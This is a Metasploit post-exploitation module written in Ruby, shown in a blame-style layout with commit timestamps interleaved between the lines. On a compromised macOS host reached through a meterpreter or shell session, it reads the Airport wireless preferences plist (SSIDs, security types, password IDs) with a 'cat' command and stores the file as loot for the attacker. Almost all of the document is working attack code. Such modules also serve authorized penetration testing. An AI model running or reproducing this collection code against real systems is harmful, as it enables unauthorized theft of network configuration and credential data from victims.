2012-03-27 06:18:38 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2012-03-27 06:18:38 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Post
|
2012-03-27 06:18:38 +00:00
|
|
|
|
2013-09-05 18:41:25 +00:00
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'OS X Gather Airport Wireless Preferences',
|
|
|
|
'Description' => %q{
|
|
|
|
This module will download OS X Airport Wireless preferences from the victim
|
|
|
|
machine. The preferences file (which is a plist) contains information such as:
|
|
|
|
SSID, Channels, Security Type, Password ID, etc.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'sinn3r'],
|
|
|
|
'Platform' => [ 'osx' ],
|
2015-09-10 20:57:43 +00:00
|
|
|
'SessionTypes' => [ "meterpreter", "shell" ]
|
2013-09-05 18:41:25 +00:00
|
|
|
))
|
|
|
|
end
|
2012-03-27 06:18:38 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def exec(cmd)
|
|
|
|
tries = 0
|
|
|
|
begin
|
|
|
|
out = cmd_exec(cmd).chomp
|
|
|
|
rescue ::Timeout::Error => e
|
|
|
|
tries += 1
|
|
|
|
if tries < 3
|
|
|
|
vprint_error("#{@peer} - #{e.message} - retrying...")
|
|
|
|
retry
|
|
|
|
end
|
|
|
|
rescue EOFError => e
|
|
|
|
tries += 1
|
|
|
|
if tries < 3
|
|
|
|
vprint_error("#{@peer} - #{e.message} - retrying...")
|
|
|
|
retry
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
2012-03-27 06:18:38 +00:00
|
|
|
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def get_air_preferences
|
|
|
|
pref = exec("cat /Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist")
|
|
|
|
return pref =~ /No such file or directory/ ? nil : pref
|
|
|
|
end
|
2012-03-27 06:18:38 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def save(data)
|
|
|
|
p = store_loot(
|
|
|
|
"apple.airport.preferences",
|
|
|
|
"plain/text",
|
|
|
|
session,
|
|
|
|
data,
|
|
|
|
"com.apple.airport.preferences.plist")
|
2012-03-27 06:18:38 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_good("#{@peer} - plist saved in #{p}")
|
|
|
|
end
|
2012-03-27 06:18:38 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def run
|
|
|
|
@peer = "#{session.session_host}:#{session.session_port}"
|
2012-03-27 06:18:38 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Download the plist. If not found (nil), then bail
|
|
|
|
pref = get_air_preferences
|
|
|
|
if pref.nil?
|
|
|
|
print_error("#{@peer} - Unable to find airport preferences")
|
|
|
|
return
|
|
|
|
end
|
2012-03-27 06:18:38 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Save the raw version of the plist
|
|
|
|
save(pref)
|
|
|
|
end
|
2012-03-27 06:18:38 +00:00
|
|
|
|
|
|
|
end
|